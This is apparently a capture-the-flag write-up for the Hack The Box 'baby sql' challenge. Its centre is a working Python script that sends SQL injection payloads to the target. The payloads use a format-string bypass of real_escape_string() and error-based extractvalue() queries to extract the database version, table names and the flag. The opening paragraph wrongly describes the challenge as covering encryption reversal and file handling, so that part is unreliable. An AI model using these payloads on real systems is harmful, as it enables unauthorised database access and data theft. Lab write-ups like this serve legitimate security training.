Post

HackTheBox baby sql Challenge

Explore the basics of cybersecurity in the baby sql Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/146

Description

I heard that *real_escape_string() functions protect you from malicious user input inside SQL statements, I hope you can’t prove me wrong…

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python3
import requests
import sys

def send_post_request(url, data):
    return requests.post(url, data=data)

if len(sys.argv) != 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)
host, port = sys.argv[1].split(':')
HOST = f'http://{host}:{port}/'
payloads = [
    {'pass': "%1$')||extractvalue(null,concat(0x7e, version()));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#"},
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#"}
]
for payload in payloads:
    print(send_post_request(HOST, payload).text)

Summary

The baby sql Challenge on Hack The Box is a medium-level web challenge that involves exploiting improper input sanitization in SQL queries. Participants leverage SQL injection through improper use of real_escape_string(), using XPath error-based injection via extractvalue() to extract database information and retrieve the flag. The challenge highlights the risks of incomplete input validation, emphasizing the importance of proper parameterized queries to prevent SQL injection vulnerabilities.

This post is licensed under CC BY 4.0 by the author.